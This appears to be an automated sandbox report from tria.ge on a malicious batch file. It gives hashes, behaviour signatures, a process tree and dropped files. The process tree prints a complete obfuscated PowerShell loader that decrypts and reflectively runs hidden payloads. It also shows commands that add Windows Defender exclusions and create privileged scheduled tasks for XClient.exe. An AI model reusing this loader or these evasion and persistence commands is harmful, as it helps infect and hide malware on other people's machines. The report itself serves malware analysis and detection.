Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/05/2024, 13:50

General

  • Target

    44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat

  • Size

    330KB

  • MD5

    54c448c9e570016b04f3f297447b3504

  • SHA1

    6e0470f78a958153b513301505ff9379a2a625a0

  • SHA256

    44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e

  • SHA512

    a5bd205f446a3a04fe753a58983c8df7a468c9b90966c07339f1eb8d36b3ced1975660e102b15fc83b65e3794c8ffb6d40ff74f8a94c1ae8e33ffa0b4599fad6

  • SSDEEP

    6144:qjP2m4Zg7LMk5EB11YdkawH8vlP+JamAtdQbCEk+ajFbkDUJEc+cEPMPonbK0v/b:qSm6g7LL6L/1HklP+szy+Fbkk5xwMAn7

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_756_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_756.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4440
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_756.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_756.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Roaming\startup_str_756.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5036
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1728
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5008
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1800
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"
              6⤵
              • Creates scheduled task(s)
              PID:764
  • C:\ProgramData\XClient.exe
    C:\ProgramData\XClient.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3040

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\XClient.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    dbbf71e9fb59f80938f09809b160e441

    SHA1

    8b9a517d846cb9a0a284f77ed88328236a85055f

    SHA256

    e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

    SHA512

    90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    e243a38635ff9a06c87c2a61a2200656

    SHA1

    ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

    SHA256

    af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

    SHA512

    4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cae60f0ddddac635da71bba775a2c5b4

    SHA1

    386f1a036af61345a7d303d45f5230e2df817477

    SHA256

    b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

    SHA512

    28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cd8d372dd2a4d7d1113c591bb656df61

    SHA1

    c84d46708e5c7108627f178e380350c87637b526

    SHA256

    3704870b29b4e2f371ab92340f3a3aa1b2b46d98088b0a5cca40ea5741c2a683

    SHA512

    666a11b8fd202d426cbdee0539278996f3ba82e56faf30327a4d0917b3ee8b59f26ac7afa6b8aaf2decc24594edcc6362f815cd822b38764ecb37d08dac76ba0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymvznevy.elw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_756.bat

    Filesize

    330KB

    MD5

    54c448c9e570016b04f3f297447b3504

    SHA1

    6e0470f78a958153b513301505ff9379a2a625a0

    SHA256

    44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e

    SHA512

    a5bd205f446a3a04fe753a58983c8df7a468c9b90966c07339f1eb8d36b3ced1975660e102b15fc83b65e3794c8ffb6d40ff74f8a94c1ae8e33ffa0b4599fad6

  • C:\Users\Admin\AppData\Roaming\startup_str_756.vbs

    Filesize

    115B

    MD5

    741332b211e1f5b2f2830c412d7dfbdd

    SHA1

    b87b9a8e21be3c7d4266d1837b09e6ef38e0446a

    SHA256

    8f35d6dccae662866d028fd45ca5c22bac330fc91ca3f3d2a421d1fccbe17851

    SHA512

    a4fac6b4315a165e0b1827ee8f984aaa2e3b82ce348830fafd996be2eaab303c7ecc8c3a635cea040429638e4c56935243a07330c7e794dcdcac78dcf05b35ee

  • memory/1988-49-0x00000185C72A0000-0x00000185C731A000-memory.dmp

    Filesize

    488KB

  • memory/2456-13-0x000001EAB4340000-0x000001EAB4348000-memory.dmp

    Filesize

    32KB

  • memory/2456-14-0x000001EACE860000-0x000001EACE8A0000-memory.dmp

    Filesize

    256KB

  • memory/2456-50-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/2456-0-0x00007FFB9CC73000-0x00007FFB9CC75000-memory.dmp

    Filesize

    8KB

  • memory/2456-12-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/2456-10-0x000001EACE600000-0x000001EACE622000-memory.dmp

    Filesize

    136KB

  • memory/2456-11-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/3040-105-0x000001B438250000-0x000001B438294000-memory.dmp

    Filesize

    272KB

  • memory/3040-106-0x000001B438670000-0x000001B4386E6000-memory.dmp

    Filesize

    472KB

  • memory/4440-30-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/4440-27-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/4440-26-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB

  • memory/4440-25-0x00007FFB9CC70000-0x00007FFB9D731000-memory.dmp

    Filesize

    10.8MB